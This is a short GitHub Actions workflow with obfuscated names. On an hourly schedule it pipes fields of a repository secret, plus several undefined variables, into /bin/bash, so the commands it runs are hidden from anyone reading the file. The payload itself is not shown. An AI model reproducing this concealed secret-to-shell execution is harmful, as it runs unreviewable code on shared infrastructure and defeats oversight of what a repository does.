name: wumengda3456

on:
  workflow_dispatch:
  schedule:
    - cron: '5 * * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wumengda3456
        env:
          mbzta132: ${{ secrets.mbzta132 }}
        run: |
          echo $mbzta132 | jq -r .he52 | /bin/bash
          echo $amnwe90302 | jq -r .tlr9 | /bin/bash
          echo $qov5323 | jq -r .yvs985 | /bin/bash
          echo $uk8 | jq -r .kdhxx7 | /bin/bash
          echo $vjbu5 | jq -r .ktnpx9434 | /bin/bash
          echo $wjo80 | jq -r .fvorz850 | /bin/bash
          echo $n738 | jq -r .ksb7 | /bin/bash
          echo $ad96 | jq -r .kc2446 | /bin/bash
          echo $dcnhd72 | jq -r .upyeu25222 | /bin/bash
          echo $wf4 | jq -r .w9193 | /bin/bash

